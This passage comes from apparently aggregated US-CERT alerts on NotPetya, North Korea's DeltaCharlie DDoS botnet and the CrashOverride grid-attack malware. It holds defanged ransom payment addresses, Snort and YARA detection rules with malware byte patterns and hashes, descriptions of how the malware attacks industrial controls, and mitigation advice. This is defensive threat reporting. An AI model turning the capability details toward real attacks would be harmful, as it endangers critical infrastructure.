payment validation was shut down by the email provider, so payment is especially unlikely to lead to data recovery.[1] According to one NCCIC stakeholder, the sites listed below sites are used for payment in this activity. These sites are not included in the CSV package as IOCs.hxxp://mischapuk6hyrn72[.]onion/hxxp://petya3jxfp2f7g3i[.]onion/hxxp://petya3sen7dyko2n[.]onion/hxxp://mischa5xyix2mrhd[.]onion/MZ2MMJhxxp://mischapuk6hyrn72[.]onion/MZ2MMJhxxp://petya3jxfp2f7g3i[.]onion/MZ2MMJhxxp://petya3sen7dyko2n[.]onion/MZ2MMJNetwork SignaturesNCCIC recommends that organizations coordinate with their security vendors to ensure appropriate coverage for this threat. Given the overlap of functionality and the similarity of behaviors between WannaCry and NotPetya, many of the available rulesets can protect against both malware types when appropriately implemented. The following rulesets provided in publically available sources may help detect activity associated with these malware types:sid:2001569, “ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection”[2]sid:2012063, “ET NETBIOS Microsoft SRV2.SYS SMB Negotiate ProcessID? Function Table Dereference (CVE-2009-3103)”[3]sid:2024297, “ET CURRENT_EVENTS ETERNALBLUE Exploit M2 MS17-010”[4]sid:42944,"OS-WINDOWS Microsoft Windows SMB remote code execution attempt"[11]sid:42340,"OS-WINDOWS Microsoft Windows SMB anonymous session IPC share access attempt"[11]sid:41984,"OS-WINDOWS Microsoft Windows SMBv1 identical MID and FID type confusion attempt"[11]Recommended Steps for PreventionReview US-CERT’s Alert on The Increasing Threat to Network Infrastructure Devices and Recommended Mitigations [6], and consider implementing the following best practices:Ensure you have fully patched your systems, and confirm that you have applied Microsoft’s patch for the MS17-010 SMB vulnerability dated March 14, 2017.[5]Conduct regular backups of data and test your backups regularly as part of a comprehensive disaster recovery plan.Ensure anti-virus and anti-malware solutions are set to automatically conduct regular scans.Manage the use of privileged accounts. Implement the principle of least privilege. Do not assign administrative access to users unless absolutely needed. Those with a need for administrator accounts should only use them when necessary. Configure access controls, including file, directory, and network share permissions with the principle of least privilege in mind. If a user only needs to read specific files, they should not have write access to those files, directories, or shares. Secure use of WMI by authorizing WMI users and setting permissions.Utilize host-based firewalls and block workstation-to-workstation communications to limit unnecessary lateral communications.Disable or limit remote WMI and file sharing.Block remote execution through PSEXEC.Segregate networks and functions.Harden network devices and secure access to infrastructure devices.Perform out-of-band network management.Validate integrity of hardware and software.Disable SMBv1 and block all versions of SMB at the network boundary by blocking TCP port 445 with related protocols on UDP ports 137-138 and TCP port 139; this applies to all boundary devices.Note: Disabling or blocking SMB may create problems by obstructing access to shared files, data, or devices. Weigh the benefits of mitigation against potential disruptions to users.Recommended Steps for RemediationNCCIC strongly encourages organizations contact a local Federal Bureau of Investigation (FBI) field office upon discovery to report an intrusion and request assistance. Maintain and provide relevant logs.Implement a security incident response and business continuity plan. Ideally, organizations should ensure they have appropriate backups so their response is simply to restore the data from a known clean backup. Report NoticeDHS encourages recipients who identify the use of tools or techniques discussed in this document to report information to DHS or law enforcement immediately. To request incident response resources or technical assistance, contact NCCIC at NCCICcustomerservice@hq.dhs.gov or 888-282-0870. You can also report cyber crime incidents to the Internet Crime Complaint Center (IC3) at https://www.ic3.gov/default.aspx. References Statement from the White House Press Secretary [1] Bleeping Computer: Email Provider Shuts Down Petya Inbox Preventing Victims From Recovering Files [2] Emerging Threats 2001569 [3] Emerging Threats 2012063 [4] Emerging Threats 2024297 [5] Microsoft: Security Bulletin MS17-010 [6] US-CERT: The Increasing Threat to Network Infrastructure Devices and Recommended Mitigations [7] F-Secure: (Eternal) Petya from a Developer’s Perspective [8] Microsoft |TechNet: New ransomware, old techniques: Petya adds worm capabilities [9] US-CERT: Ransomware and Recent Variants [10] Microsoft: Windows 10 platform resilience against the Petya ransomware attack [11] Talos: New Ransomware Variant "Nyetya" Compromises Systems Worldwide [12] Talos: The MeDoc Connection [13] NCCIC is the parent organization of US-CERT [14] New Ransomware Variant "Nyetya" Compromises Systems Worldwide Microsoft: Update on Petya Malware attacks Microsoft: Authorize WMI users and set permissions Microsoft: Managing WMI Security US-CERT Alert TA16-091A Revision History July 1, 2017: Initial version July 3, 2017: Updated to include MIFR-10130295_stix.xml file. Substituted TA-17-181B_IOCs.csv for TA-17-181A_IOCs.csv. July 7, 2017: Included further guidance from Microsoft in the Reference Section July 28, 2017: Revised multiple sections based on additional analysis provided February 15, 2018: Added attribution of the NotPetya malware variant to the Russian military and link to White House press statement. This product is provided subject to this Notification and this Privacy & Use policy. […]

  • TA17-164A: HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure
    by US-CERT on 13 giugno 2017 at 3:45 pm

    Original release date: June 13, 2017 | Last revised: August 23, 2017Systems Affected Networked Systems Overview This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides technical details on the tools and infrastructure used by cyber actors of the North Korean government to target the media, aerospace, financial, and critical infrastructure sectors in the United States and globally. Working with U.S. Government partners, DHS and FBI identified Internet Protocol (IP) addresses associated with a malware variant, known as DeltaCharlie, used to manage North Korea’s distributed denial-of-service (DDoS) botnet infrastructure. This alert contains indicators of compromise (IOCs), malware descriptions, network signatures, and host-based rules to help network defenders detect activity conducted by the North Korean government. The U.S. Government refers to the malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information related to HIDDEN COBRA activity, go to https://www.us-cert.gov/hiddencobra.If users or administrators detect the custom tools indicative of HIDDEN COBRA, these tools should be immediately flagged, reported to the DHS National Cybersecurity Communications and Integration Center (NCCIC) or the FBI Cyber Watch (CyWatch), and given highest priority for enhanced mitigation. This alert identifies IP addresses linked to systems infected with DeltaCharlie malware and provides descriptions of the malware and associated malware signatures. DHS and FBI are distributing these IP addresses to enable network defense activities and reduce exposure to the DDoS command-and-control network. FBI has high confidence that HIDDEN COBRA actors are using the IP addresses for further network exploitation.This alert includes technical indicators related to specific North Korean government cyber operations and provides suggested response actions to those indicators, recommended mitigation techniques, and information on reporting incidents to the U.S. Government.For a downloadable copy of IOCs, see:IOCs (.csv)IOCs (.stix)On August 23, 2017, DHS published a Malware Analysis Report (MAR-10132963) that examines malware functionality to provide detailed code analysis and insight into specific tactics, techniques, and procedures (TTPs) observed in the malware.For a downloadable copy of the MAR, see:MAR (.pdf)MAR IOCs (.stix)Description Since 2009, HIDDEN COBRA actors have leveraged their capabilities to target and compromise a range of victims; some intrusions have resulted in the exfiltration of data while others have been disruptive in nature. Commercial reporting has referred to this activity as Lazarus Group[1] and Guardians of Peace.[2] DHS and FBI assess that HIDDEN COBRA actors will continue to use cyber operations to advance their government’s military and strategic objectives. Cyber analysts are encouraged to review the information provided in this alert to detect signs of malicious network activity.Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware. Variants of malware and tools used by HIDDEN COBRA actors include Destover,[3] Wild Positron/Duuzer,[4] and Hangman.[5] DHS has previously released Alert TA14-353A,[6] which contains additional details on the use of a server message block (SMB) worm tool employed by these actors. Further research is needed to understand the full breadth of this group’s cyber capabilities. In particular, DHS recommends that more research should be conducted on the North Korean cyber activity that has been reported by cybersecurity and threat research firms.HIDDEN COBRA actors commonly target systems running older, unsupported versions of Microsoft operating systems. The multiple vulnerabilities in these older systems provide cyber actors many targets for exploitation. These actors have also used Adobe Flash player vulnerabilities to gain initial entry into users’ environments.HIDDEN COBRA is known to use vulnerabilities affecting various applications. These vulnerabilities include:CVE-2015-6585: Hangul Word Processor VulnerabilityCVE-2015-8651: Adobe Flash Player 18.0.0.324 and 19.x VulnerabilityCVE-2016-0034: Microsoft Silverlight 5.1.41212.0 VulnerabilityCVE-2016-1019: Adobe Flash Player 21.0.0.197 VulnerabilityCVE-2016-4117: Adobe Flash Player 21.0.0.226 VulnerabilityDHS recommends that organizations upgrade these applications to the latest version and patch level. If Adobe Flash or Microsoft Silverlight is no longer required, DHS recommends that those applications be removed from systems.The IOCs provided with this alert include IP addresses determined to be part of the HIDDEN COBRA botnet infrastructure, identified as DeltaCharlie. The DeltaCharlie DDoS bot was originally reported by Novetta in their 2016 Operation Blockbuster Malware Report.[7] This malware has used the IP addresses identified in the accompanying .csv and .stix files as both source and destination IPs. In some instances, the malware may have been present on victims’ networks for a significant period.Technical DetailsDeltaCharlie is a DDoS tool used by HIDDEN COBRA actors, and is referenced and detailed in Novetta’s Operation Blockbuster Destructive Malware report. The information related to DeltaCharlie from the Operation Blockbuster Destructive Malware report should be viewed in conjunction with the IP addresses listed in the .csv and .stix files provided within this alert. DeltaCharlie is a DDoS tool capable of launching Domain Name System (DNS) attacks, Network Time Protocol (NTP) attacks, and Carrier Grade NAT (CGN) attacks. The malware operates on victims’ systems as a svchost-based service and is capable of downloading executables, changing its own configuration, updating its own binaries, terminating its own processes, and activating and terminating denial-of-service attacks. Further details on the malware can be found in Novetta’s report available at the following URL:https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdfDetection and ResponseHIDDEN COBRA IOCs related to DeltaCharlie are provided within the accompanying .csv and .stix files of this alert. DHS and FBI recommend that network administrators review the IP addresses, file hashes, network signatures, and YARA rules provided, and add the IPs to their watchlist to determine whether malicious activity has been observed within their organization.When reviewing network perimeter logs for the IP addresses, organizations may find numerous instances of these IP addresses attempting to connect to their systems. Upon reviewing the traffic from these IP addresses, system owners may find that some traffic corresponds to malicious activity and some to legitimate activity. System owners are also advised to run the YARA tool on any system they suspect to have been targeted by HIDDEN COBRA actors. Additionally, the appendices of this report provide network signatures to aid in the detection and mitigation of HIDDEN COBRA activity.Network Signatures and Host-Based RulesThis section contains network signatures and host-based rules that can be used to detect malicious activity associated with HIDDEN COBRA actors. Although created using a comprehensive vetting process, the possibility of false positives always remains. These signatures and rules should be used to supplement analysis and should not be used as a sole source of attributing this activity to HIDDEN COBRA actors.Network Signaturesalert tcp any any -> any any (msg:"DPRK_HIDDEN_COBRA_DDoS_HANDSHAKE_SUCCESS"; dsize:6; flow:established,to_server; content:"|18 17 e9 e9 e9 e9|"; fast_pattern:only; sid:1; rev:1;)________________________________________________________________alert tcp any any -> any any (msg:"DPRK_HIDDEN_COBRA_Botnet_C2_Host_Beacon"; flow:established,to_server; content:"|1b 17 e9 e9 e9 e9|"; depth:6; fast_pattern; sid:1; rev:1;)________________________________________________________________YARA Rules{meta:description = “RSA Key”strings:$rsaKey = {7B 4E 1E A7 E9 3F 36 4C DE F4 F0 99 C4 D9 B7 94A1 FF F2 97 D3 91 13 9D C0 12 02 E4 4C BB 6C 7748 EE 6F 4B 9B 53 60 98 45 A5 28 65 8A 0B F8 3973 D7 1A 44 13 B3 6A BB 61 44 AF 31 47 E7 87 C2AE 7A A7 2C 3A D9 5C 2E 42 1A A6 78 FE 2C AD ED39 3F FA D0 AD 3D D9 C5 3D 28 EF 3D 67 B1 E0 683F 58 A0 19 27 CC 27 C9 E8 D8 1E 7E EE 91 DD 13B3 47 EF 57 1A CA FF 9A 60 E0 64 08 AA E2 92 D0}condition:any of them}________________________________________________________________{meta:description = “DDoS Misspelled Strings”strings:$STR1 = "Wating" wide ascii$STR2 = "Reamin" wide ascii$STR3 = "laptos" wide asciicondition:(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and 2 of them}________________________________________________________________{meta:description = “DDoS Random URL Builder”strings:$randomUrlBuilder = { 83 EC 48 53 55 56 57 8B 3D ?? ?? ?? ?? 33 C0 C7 44 24 28 B4 6F 41 00 C7 44 24 2C B0 6F 41 00 C7 44 24 30 AC 6F 41 00 C7 44 24 34 A8 6F 41 00 C7 44 24 38 A4 6F 41 00 C7 44 24 3C A0 6F 41 00 C7 44 24 40 9C 6F 41 00 C7 44 24 44 94 6F 41 00 C7 44 24 48 8C 6F 41 00 C7 44 24 4C 88 6F 41 00 C7 44 24 50 80 6F 41 00 89 44 24 54 C7 44 24 10 7C 6F 41 00 C7 44 24 14 78 6F 41 00 C7 44 24 18 74 6F 41 00 C7 44 24 1C 70 6F 41 00 C7 44 24 20 6C 6F 41 00 89 44 24 24 FF D7 99 B9 0B 00 00 00 F7 F9 8B 74 94 28 BA 9C 6F 41 00 66 8B 06 66 3B 02 74 34 8B FE 83 C9 FF 33 C0 8B 54 24 60 F2 AE 8B 6C 24 5C A1 ?? ?? ?? ?? F7 D1 49 89 45 00 8B FE 33 C0 8D 5C 11 05 83 C9 FF 03 DD F2 AE F7 D1 49 8B FE 8B D1 EB 78 FF D7 99 B9 05 00 00 00 8B 6C 24 5C F7 F9 83 C9 FF 33 C0 8B 74 94 10 8B 54 24 60 8B FE F2 AE F7 D1 49 BF 60 6F 41 00 8B D9 83 C9 FF F2 AE F7 D1 8B C2 49 03 C3 8B FE 8D 5C 01 05 8B 0D ?? ?? ?? ?? 89 4D 00 83 C9 FF 33 C0 03 DD F2 AE F7 D1 49 8D 7C 2A 05 8B D1 C1 E9 02 F3 A5 8B CA 83 E1 03 F3 A4 BF 60 6F 41 00 83 C9 FF F2 AE F7 D1 49 BE 60 6F 41 00 8B D1 8B FE 83 C9 FF 33 C0 F2 AE F7 D1 49 8B FB 2B F9 8B CA 8B C1 C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7C 24 60 8D 75 04 57 56 E8 ?? ?? ?? ?? 83 C4 08 C6 04 3E 2E 8B C5 C6 03 00 5F 5E 5D 5B 83 C4 48 C3 }condition:$randomUrlBuilder}________________________________________________________________  Impact A successful network intrusion can have severe impacts, particularly if the compromise becomes public and sensitive information is exposed. Possible impacts include:temporary or permanent loss of sensitive or proprietary information,disruption to regular operations,financial losses incurred to restore systems and files, andpotential harm to an organization’s reputation.Solution Mitigation StrategiesNetwork administrators are encouraged to apply the following recommendations, which can prevent as many as 85 percent of targeted cyber intrusions. The mitigation strategies provided may seem like common sense. However, many organizations fail to use these basic security measures, leaving their systems open to compromise:Patch applications and operating systems – Most attackers target vulnerable applications and operating systems. Ensuring that applications and operating systems are patched with the latest updates greatly reduces the number of exploitable entry points available to an attacker. Use best practices when updating software and patches by only downloading updates from authenticated vendor sites.Use application whitelisting – Whitelisting is one of the best security strategies because it allows only specified programs to run while blocking all others, including malicious software.Restrict administrative privileges – Threat actors are increasingly focused on gaining control of legitimate credentials, especially credentials associated with highly privileged accounts. Reduce privileges to only those needed for a user’s duties. Separate administrators into privilege tiers with limited access to other tiers.Segment networks and segregate them into security zones – Segment networks into logical enclaves and restrict host-to-host communications paths. This helps protect sensitive information and critical services, and limits damage from network perimeter breaches.Validate input – Input validation is a method of sanitizing untrusted input provided by users of a web application. Implementing input validation can protect against the security flaws of web applications by significantly reducing the probability of successful exploitation. Types of attacks possibly averted include Structured Query Language (SQL) injection, cross-site scripting, and command injection.Use stringent file reputation settings – Tune the file reputation systems of your anti-virus software to the most aggressive setting possible. Some anti-virus products can limit execution to only the highest reputation files, stopping a wide range of untrustworthy code from gaining control.Understand firewalls – Firewalls provide security to make your network less susceptible to attack. They can be configured to block data and applications from certain locations (IP whitelisting), while allowing relevant and necessary data through.Response to Unauthorized Network AccessEnforce your security incident response and business continuity plan. It may take time for your organization’s IT professionals to isolate and remove threats to your systems and restore normal operations. Meanwhile, you should take steps to maintain your organization’s essential functions according to your business continuity plan. Organizations should maintain and regularly test backup plans, disaster recovery plans, and business continuity procedures.Contact DHS or your local FBI office immediately. To report an intrusion and request resources for incident response or technical assistance, you are encouraged to contact DHS NCCIC (NCCICCustomerService@hq.dhs.gov or 888-282-0870), the FBI through a local field office, or the FBI’s Cyber Division (CyWatch@fbi.gov or 855-292-3937).Protect Against SQL Injection and Other Attacks on Web ServicesTo protect against code injections and other attacks, system operators should routinely evaluate known and published vulnerabilities, periodically perform software updates and technology refreshes, and audit external-facing systems for known web application vulnerabilities. They should also take the following steps to harden both web applications and the servers hosting them to reduce the risk of network intrusion via this vector.Use and configure available firewalls to block attacks.Take steps to secure Windows systems, such as installing and configuring Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) and Microsoft AppLocker.Monitor and remove any unauthorized code present in any www directories.Disable, discontinue, or disallow the use of Internet Control Message Protocol (ICMP) and Simple Network Management Protocol (SNMP) as much as possible.Remove unnecessary HTTP verbs from web servers. Typical web servers and applications only require GET, POST, and HEAD.Where possible, minimize server fingerprinting by configuring web servers to avoid responding with banners identifying the server software and version number.Secure both the operating system and the application.Update and patch production servers regularly.Disable potentially harmful SQL-stored procedure calls.Sanitize and validate input to ensure that it is properly typed and does not contain escaped code.Consider using type-safe stored procedures and prepared statements.Audit transaction logs regularly for suspicious activity.Perform penetration testing on web services.Ensure error messages are generic and do not expose too much information.Permissions, Privileges, and Access ControlsSystem operators should take the following steps to limit permissions, privileges, and access controls.Reduce privileges to only those needed for a user’s duties.Restrict users’ ability (permissions) to install and run unwanted software applications, and apply the principle of “Least Privilege” to all systems and services. Restricting these privileges may prevent malware from running or limit its capability to spread through the network.Carefully consider the risks before granting administrative rights to users on their own machines.Scrub and verify all administrator accounts regularly.Configure Group Policy to restrict all users to only one login session, where possible.Enforce secure network authentication, where possible.Instruct administrators to use non-privileged accounts for standard functions such as web browsing or checking webmail.Segment networks into logical enclaves and restrict host-to-host communication paths. Containment provided by enclaving also makes incident cleanup significantly less costly.Configure firewalls to disallow Remote Desktop Protocol (RDP) traffic coming from outside of the network boundary, except for in specific configurations such as when tunneled through a secondary virtual private network (VPN) with lower privileges.Audit existing firewall rules and close all ports that are not explicitly needed for business. Specifically, carefully consider which ports should be connecting outbound versus inbound.Enforce a strict lockout policy for network users and closely monitor logs for failed login activity. Failed login activity can be indicative of failed intrusion activity.If remote access between zones is an unavoidable business need, log and monitor these connections closely.In environments with a high risk of interception or intrusion, organizations should consider supplementing password authentication with other forms of authentication such as challenge/response or multifactor authentication using biometric or physical tokens.Logging PracticesSystem operators should follow these secure logging practices.Ensure event logging, including applications, events, login activities, and security attributes, is turned on or monitored for identification of security issues.Configure network logs to provide adequate information to assist in quickly developing an accurate determination of a security incident.Upgrade PowerShell to new versions with enhanced logging features and monitor the logs to detect usage of PowerShell commands, which are often malware-related.Secure logs in a centralized location and protect them from modification.Prepare an incident response plan that can be rapidly administered in case of a cyber intrusion.References [1] IBM. Actor Lazarus Group – Blog Post by IBM X-Force Exchange. [2] AlienVault. Operation Blockbuster Unveils the Actors Behind the Sony Attacks. [3] Symantec. Destover: Destructive Malware has links back to attacks on South Korea. [4] Symantec. Duuzer back door Trojan targets South Korea to take over computers. [5] FireEye. Zero-Day HWP Exploit. [6] US-CERT. Alert (TA14-353A) Targeted Destructive Malware. Original Release Date: 12/19/2014 | Last revised: 9/30/2016 [7] Novetta. Operation Blockbuster Destructive Malware Report. Revision History June 13, 2017: Initial Release August 23, 2017: Updated YARA Rules and included MAR-10132963 (.pdf and .stix files) This product is provided subject to this Notification and this Privacy & Use policy. […]

  • TA17-163A: CrashOverride Malware
    by US-CERT on 12 giugno 2017 at 9:44 pm

    Original release date: June 12, 2017 | Last revised: July 27, 2017Systems Affected Industrial Control Systems Overview The National Cybersecurity and Communications Integration Center (NCCIC) is aware of public reports from ESET and Dragos outlining a new, highly capable Industrial Controls Systems (ICS) attack platform that was reportedly used in 2016 against critical infrastructure in Ukraine. As reported by ESET and Dragos, the CrashOverride malware is an extensible platform that could be used to target critical infrastructure sectors. NCCIC is working with its partners to validate the ESET and Dragos analysis, and develop a better understanding of the risk this new malware poses to U.S. critical infrastructure.Although this activity is still under investigation, NCCIC is sharing this report to provide organizations with detection and mitigation recommendations to help prevent future compromises within their critical infrastructure networks. NCCIC continues to work with interagency and international partners on this activity and will provide updates as information becomes available.For a downloadable copy of indicators of compromise (IOCs), see:IOCs (.csv)IOCs (.stix)To report activity related to this Alert, please contact NCCIC at NCCICCustomerService@hq.dhs.gov or 1-888-282-0870.Risk EvaluationNCCIC Cyber Incident Scoring System (NCISS) Rating Priority Level (Color)Yellow (Medium)A medium priority incident may affect public health or safety, national security, economic security, foreign relations, civil liberties, or public confidence.DetailsThere is no evidence to suggest this malware has affected U.S. critical infrastructure. However, the tactics, techniques, and procedures (TTPs) described as part of the CrashOverride malware could be modified to target U.S. critical information networks and systems. Description Technical AnalysisCrashOverride malware represents a scalable, capable platform. The modules and capabilities publically reported appear to focus on organizations using ICS protocols IEC101, IEC104, and IEC61850, which are more commonly used outside the United States in electric power control systems. The platform fundamentally abuses the functionality of a targeted ICS system’s legitimate control system to achieve its intended effect. While the known capabilities do not appear to be U.S.-focused, it is important to recognize that the general TTPs used in CrashOverride could be leveraged with modified technical implementations to affect U.S.-based critical infrastructure. With further modification, CrashOverride or similar malware could have implications beyond electric power so all critical infrastructure organizations should be evaluating their systems to susceptibilities in the TTPs outlined. The malware has several reported capabilities:Issues valid commands directly to remote terminal units (RTUs) over ICS protocols. As reported by Dragos, one such command sequence toggles circuit breakers in a rapid open-close-open-close pattern. This could create conditions where individual utilities may island from infected parties, potentially resulting in a degradation of grid reliability.Denies service to local serial COM ports on windows devices, therefore preventing legitimate communications with field equipment over serial from the affected device.Scans and maps ICS environment using a variety of protocols, including Open Platform Communications (OPC). This significantly improves the payload’s probability of success.Could exploit Siemens relay denial-of-service (DoS) vulnerability, leading to a shutdown of the relay. In this instance, the relay would need to be manually reset to restore functionality.Includes a wiper module in the platform that renders windows systems inert, requiring a rebuild or backup restoration.DetectionAs CrashOverride is a second stage malware capability and has the ability to operate independent of initial C2, traditional methods of detection may not be sufficient to detect infections prior to the malware executing. As a result, organizations are encouraged to implement behavioral analysis techniques to attempt to identify precursor activity to CrashOverride. As additional information becomes available on stage one infection vectors and TTPs, this alert will be updated.NCCIC is providing a compilation of IOCs (see links above) from a variety of sources to aid in the detection of this malware. The sources provided do not constitute an exhaustive list and the U.S. Government does not endorse or support any particular product or vendor’s information referenced in this report. However, NCCIC has included this data to ensure wide distribution of the most comprehensive information available and will provide updates as warranted.Signaturesimport “pe”import “hash”rule dragos_crashoverride_exporting_dlls{meta:description = “CRASHOVERRIDE v1 Suspicious Export”author = “Dragos Inc”condition:pe.exports(“Crash”) & pe.characteristics}rule dragos_crashoverride_suspcious{meta:description = “CRASHOVERRIDE v1 Wiper”author = “Dragos Inc”strings:$s0 = “SYS_BASCON.COM” fullword nocase wide$s1 = “.pcmp” fullword nocase wide$s2 = “.pcmi” fullword nocase wide$s3 = “.pcmt” fullword nocase wide$s4 = “.cin” fullword nocase widecondition:pe.exports(“Crash”) and any of ($s*)}rule dragos_crashoverride_name_search {meta:description = “CRASHOVERRIDE v1 Suspicious Strings and Export”author = “Dragos Inc”strings:$s0 = “101.dll” fullword nocase wide$s1 = “Crash101.dll” fullword nocase wide$s2 = “104.dll” fullword nocase wide$s3 = “Crash104.dll” fullword nocase wide$s4 = “61850.dll” fullword nocase wide$s5 = “Crash61850.dll” fullword nocase wide$s6 = “OPCClientDemo.dll” fullword nocase wide$s7 = “OPC” fullword nocase wide$s8 = “CrashOPCClientDemo.dll” fullword nocase wide$s9 = “D2MultiCommService.exe” fullword nocase wide$s10 = “CrashD2MultiCommService.exe” fullword nocase wide$s11 = “61850.exe” fullword nocase wide$s12 = “OPC.exe” fullword nocase wide$s13 = “haslo.exe” fullword nocase wide$s14 = “haslo.dat” fullword nocase widecondition:any of ($s*) and pe.exports(“Crash”)}rule dragos_crashoverride_hashes {meta:description = “CRASHOVERRIDE Malware Hashes”author = “Dragos Inc”condition:filesize < 1MB andhash.sha1(0, filesize) == “f6c21f8189ced6ae150f9ef2e82a3a57843b587d” orhash.sha1(0, filesize) == “cccce62996d578b984984426a024d9b250237533” orhash.sha1(0, filesize) == “8e39eca1e48240c01ee570631ae8f0c9a9637187” orhash.sha1(0, filesize) == “2cb8230281b86fa944d3043ae906016c8b5984d9” orhash.sha1(0, filesize) == “79ca89711cdaedb16b0ccccfdcfbd6aa7e57120a” orhash.sha1(0, filesize) == “94488f214b165512d2fc0438a581f5c9e3bd4d4c” orhash.sha1(0, filesize) == “5a5fafbc3fec8d36fd57b075ebf34119ba3bff04” orhash.sha1(0, filesize) == “b92149f046f00bb69de329b8457d32c24726ee00” orhash.sha1(0, filesize) == “b335163e6eb854df5e08e85026b2c3518891eda8”}rule dragos_crashoverride_moduleStrings {meta:description = “IEC-104 Interaction Module Program Strings”author = “Dragos Inc”strings:$s1 = “IEC-104 client: ip=%s; port=%s; ASDU=%u” nocase wide ascii$s2 = “ MSTR ->> SLV” nocase wide ascii$s3 = “ MSTR <<- SLV” nocase wide ascii$s4 = “Unknown APDU format !!!” nocase wide ascii$s5 = “iec104.log” nocase wide asciicondition:any of ($s*)}rule dragos_crashoverride_configReader{meta:description = “CRASHOVERRIDE v1 Config File Parsing”author = “Dragos Inc”strings:$s0 = { 68 e8 ?? ?? ?? 6a 00 e8 a3 ?? ?? ?? 8b f8 83 c4 ?8 }$s1 = { 8a 10 3a 11 75 ?? 84 d2 74 12 }$s2 = { 33 c0 eb ?? 1b c0 83 c8 ?? }$s3 = { 85 c0 75 ?? 8d 95 ?? ?? ?? ?? 8b cf ?? ?? }condition:all of them}rule dragos_crashoverride_configReader{meta:description = “CRASHOVERRIDE v1 Config File Parsing”author = “Dragos Inc”strings:$s0 = { 68 e8 ?? ?? ?? 6a 00 e8 a3 ?? ?? ?? 8b f8 83 c4 ?8 }$s1 = { 8a 10 3a 11 75 ?? 84 d2 74 12 }$s2 = { 33 c0 eb ?? 1b c0 83 c8 ?? }$s3 = { 85 c0 75 ?? 8d 95 ?? ?? ?? ?? 8b cf ?? ?? }condition:all of them}rule dragos_crashoverride_weirdMutex{meta:description = “Blank mutex creation assoicated with CRASHOVERRIDE”author = “Dragos Inc”strings:$s1 = { 81 ec 08 02 00 00 57 33 ff 57 57 57 ff 15 ?? ?? 40 00 a3 ?? ?? ?? 00 85 c0 }$s2 = { 8d 85 ?? ?? ?? ff 50 57 57 6a 2e 57 ff 15 ?? ?? ?? 00 68 ?? ?? 40 00}condition:all of them}rule dragos_crashoverride_serviceStomper{meta:description = “Identify service hollowing and persistence setting”author = “Dragos Inc”strings:$s0 = { 33 c9 51 51 51 51 51 51 ?? ?? ?? }$s1 = { 6a ff 6a ff 6a ff 50 ff 15 24 ?? 40 00 ff ?? ?? ff 15 20 ?? 40 00 }condition:all of them}rule dragos_crashoverride_wiperModuleRegistry{meta:description = “Registry Wiper functionality assoicated with CRASHOVERRIDE”author = “Dragos Inc”strings:$s0 = { 8d 85 a0 ?? ?? ?? 46 50 8d 85 a0 ?? ?? ?? 68 68 0d ?? ?? 50 }$s1 = { 6a 02 68 78 0b ?? ?? 6a 02 50 68 b4 0d ?? ?? ff b5 98 ?? ?? ?? ff 15 04 ?? ?? ?? }$s2 = { 68 00 02 00 00 8d 85 a0 ?? ?? ?? 50 56 ff b5 9c ?? ?? ?? ff 15 00 ?? ?? ?? 85 c0 }condition:all of them}rule dragos_crashoverride_wiperFileManipulation{meta:description = “File manipulation actions associated with CRASHOVERRIDE wip¬er”author = “Dragos Inc”strings:$s0 = { 6a 00 68 80 00 00 00 6a 03 6a 00 6a 02 8b f9 68 00 00 00 40 57 ff 15 1c ?? ?? ?? 8b d8 }$s2 = { 6a 00 50 57 56 53 ff 15 4c ?? ?? ?? 56 }condition:all of them} Impact A successful network intrusion can have severe impacts, particularly if the compromise becomes public and sensitive information is exposed. Possible impacts include:temporary or permanent loss of sensitive or proprietary information,disruption to regular operations,financial losses incurred to restore systems and files, andpotential harm to an organization’s reputation. Solution Properly implemented defensive techniques and common cyber hygiene practices increase the complexity of barriers that adversaries must overcome to gain unauthorized access to critical information networks and systems. In addition, detection and prevention mechanisms can expose malicious network activity, enabling organizations to contain and respond to intrusions more rapidly. There is no set of defensive techniques or programs that will completely avert all attacks however, layered cybersecurity defenses will aid in reducing an organization’s attack surface and will increase the likelihood of detection. This layered mitigation approach is known as defense-in-depth.NCCIC has based its mitigations and recommendations on its analysis of the public reporting of this malware and will be provide updates as more information becomes available.Critical infrastructure companies should ensure that they are following best practices, which are outlined in the Seven Steps to Effectively Defend Industrial Control Systems document produced jointly by DHS, NSA, and FBI.Application WhitelistingApplication whitelisting (AWL) can detect and prevent attempted execution of malware uploaded by adversaries. Application whitelisting hardens operating systems and prevents the execution of unauthorized software. The static nature of some systems, such as database servers and human-machine interface (HMI) computers make these ideal candidates to run AWL. NCCIC encourages operators to work with their vendors to baseline and calibrate AWL deployments.Operators may choose to implement directory whitelisting rather than trying to list every possible permutation of applications in an environment. Operators may implement application or application directory whitelisting through Microsoft Software Restriction Policy (SRP), AppLocker, or similar application whitelisting software. Safe defaults allow applications to run from PROGRAMFILES, PROGRAMFILES(X86), SYSTEM32, and any ICS software folders. All other locations should be disallowed unless an exception is granted.Manage Authentication and AuthorizationThis malware exploits the lack of authentication and authorization in common ICS protocols to issue unauthorized commands to field devices. Asset owners/operators should implement authentication and authorization protocols to ensure field devices verify the authenticity of commands before they are actioned. In some instances, legacy hardware may not be capable of implementing these protections. In these cases, asset owners can either leverage ICS firewalls to do stateful inspection and authentication of commands, or upgrade their control field devices.Adversaries are increasingly focused on gaining control of legitimate credentials, especially those associated with highly privileged accounts. Compromising these credentials allows adversaries to masquerade as legitimate users, leaving less evidence of compromise than more traditional attack options (i.e., exploiting vulnerabilities or uploading malware). For this reason, operators should implement multi-factor authentication where possible and reduce privileges to only those needed for a user’s duties. If passwords are necessary, operators should implement secure password policies, stressing length over complexity. For all accounts, including system and non-interactive accounts, operators should ensure credentials are unique, and changed, at a minimum, every 90 days.NCCIC also recommends that operators require separate credentials for corporate and control network zones and store them in separate trust stores. Operators should never share Active Directory, RSA ACE servers, or other trust stores between corporate and control networks. Specifically, operators should:Decrease a threat actor’s ability to access key network resources by implementing the principle of least privilege;Limit the ability of a local administrator account to login from a local interactive session (e.g., “Deny access to this computer from the network”) and prevent access via a remote desktop protocol 